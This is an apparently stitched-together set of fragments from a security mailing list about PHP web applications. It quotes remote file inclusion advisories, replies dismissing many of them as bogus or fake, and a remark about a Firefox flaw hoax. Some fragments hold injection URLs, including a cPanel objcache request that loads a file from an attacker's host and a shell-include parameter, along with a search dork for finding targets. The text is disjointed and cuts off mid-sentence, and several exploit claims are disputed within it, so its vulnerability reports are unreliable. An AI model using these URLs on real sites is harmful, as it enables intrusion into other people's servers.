+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=
Weekly Drawing Contest = (check_vote.php) Remote File Disclosure Vuln
Script: Weekly Drawing Contest
Version: 0.0.1
S!Te: http://www.hotscripts.com/jump.php?listing_id=52638jump_type=1
Discover: BorN To K!LL
This one is so
[EMAIL PROTECTED] wrote:
# Lazarus Guestbook (admin.php)Remote File Include Expliot
# D.Script: http://www.carbonize.co.uk
# Dork: Powered by Lazarus Guestbook from carbonize.co.uk
# Discovered by Crack_man
# Homepage: http://www.b0rizq.biz
# Greetz To :B0rizq red_casper Draknaz kaiba
[EMAIL PROTECTED] wrote:
name : web host manager
vendor : cpanel.net
by : s3rv3r_hack3r (ali [at] hackerz [dot] ir)
web-site : www.hackerz.ir - ali.hackerz.ir
exploit:
http://domain.com:2086/scripts2/objcache?obj=http://www.hackerz.ir/?
I have confirmed that this does in fact work once
snip class=drivel
file ;
index.php
sources/usercp.php
sources/admin.php
bugs ;
require_once({$CONF['path']}/sources/misc/classes.php);
Author: BorN To K!LL
Maybe this person should be called BorN To Gr3p or BorN To Post Fake
and Pointl3ss ExploiTz!
###
Bug in :. news.php
code :
require_once($CONFIG['script_path'].functions/functions.php);
www.site.com/adobe_php_sdk_path/libraries/amfphp/amf-core/custom/CachedGateway.php?AMFPHP_BASE=sh3ll?_
All of these reports are bogus (Smarty 2.6.1, CSLH2), as the original
poster obviously does not understand how constants work.
As taken from the PHP manual:
Constants may only be
According to this article it was a hoax... So who is telling the truth,
and what sort of fall out will come from this?
http://www.betanews.com/article/Firefox_Flaw_a_Hoax_Admits_Speaker/1159903320
Tom Walsh
[EMAIL PROTECTED] wrote:
[EMAIL PROTECTED] wrote:
#SolpotCrew
Community
#
# modernbill ver 1.6 (DIR) Remote File Inclusion
#
# Download file : http://freshmeat.net/projects/modernbill/
#
Considering that this software is currently on revision 5.0, is